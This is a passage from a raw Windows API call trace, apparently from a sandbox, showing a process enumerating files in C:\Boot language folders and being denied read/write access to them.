Flags=0x0, Size=0x20) returned 0x88450 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0084.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.635] AreFileApisANSI () returned 1 [0084.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-HK\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.635] AreFileApisANSI () returned 1 [0084.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0084.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 30 [0084.635] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.636] GetFileType (hFile=0x354) returned 0x1 [0084.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.636] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.636] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.636] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.636] CloseHandle (hObject=0x354) returned 1 [0084.636] AreFileApisANSI () returned 1 [0084.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0084.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 30 [0084.636] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.637] GetLastError () returned 0x5 [0084.637] GetLastError () returned 0x5 [0084.637] SetLastError (dwErrCode=0x5) [0084.637] GetLastError () returned 0x5 [0084.637] SetLastError (dwErrCode=0x5) [0084.637] GetLastError () returned 0x5 [0084.637] SetLastError (dwErrCode=0x5) [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.637] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0084.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0084.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.638] AreFileApisANSI () returned 1 [0084.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-HK\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-HK\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0084.638] AreFileApisANSI () returned 1 [0084.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53490 [0084.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53490, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-HK\\memtest.exe.mui") returned 30 [0084.638] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.638] GetFileType (hFile=0x354) returned 0x1 [0084.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.639] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.639] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.639] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.639] CloseHandle (hObject=0x354) returned 1 [0084.639] AreFileApisANSI () returned 1 [0084.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0084.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-HK\\memtest.exe.mui") returned 30 [0084.639] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.640] GetLastError () returned 0x5 [0084.640] GetLastError () returned 0x5 [0084.640] SetLastError (dwErrCode=0x5) [0084.640] GetLastError () returned 0x5 [0084.640] SetLastError (dwErrCode=0x5) [0084.640] GetLastError () returned 0x5 [0084.640] SetLastError (dwErrCode=0x5) [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.640] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.640] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.640] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x690d8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ꕘ")) returned 0 [0084.640] FindClose (in: hFindFile=0x78510 | out: hFindFile=0x78510) returned 1 [0084.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0084.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.641] AreFileApisANSI () returned 1 [0084.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-TW", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-TW", lpUsedDefaultChar=0x0) returned 14 [0084.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.641] AreFileApisANSI () returned 1 [0084.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0084.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-TW") returned 14 [0084.641] CreateFileW (lpFileName="C:\\Boot\\zh-TW" (normalized: "c:\\boot\\zh-tw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.641] GetLastError () returned 0x5 [0084.641] GetLastError () returned 0x5 [0084.641] SetLastError (dwErrCode=0x5) [0084.641] GetLastError () returned 0x5 [0084.641] SetLastError (dwErrCode=0x5) [0084.642] GetLastError () returned 0x5 [0084.642] SetLastError (dwErrCode=0x5) [0084.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.642] AreFileApisANSI () returned 1 [0084.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88450 [0084.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88450, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-TW") returned 14 [0084.642] CreateFileW (lpFileName="C:\\Boot\\zh-TW" (normalized: "c:\\boot\\zh-tw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.642] GetLastError () returned 0x5 [0084.642] GetLastError () returned 0x5 [0084.642] SetLastError (dwErrCode=0x5) [0084.642] GetLastError () returned 0x5 [0084.642] SetLastError (dwErrCode=0x5) [0084.642] GetLastError () returned 0x5 [0084.642] SetLastError (dwErrCode=0x5) [0084.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.642] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x1a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x7aaf0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x1a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="")) returned 0 [0084.642] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.643] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-TW\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78950 [0084.643] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 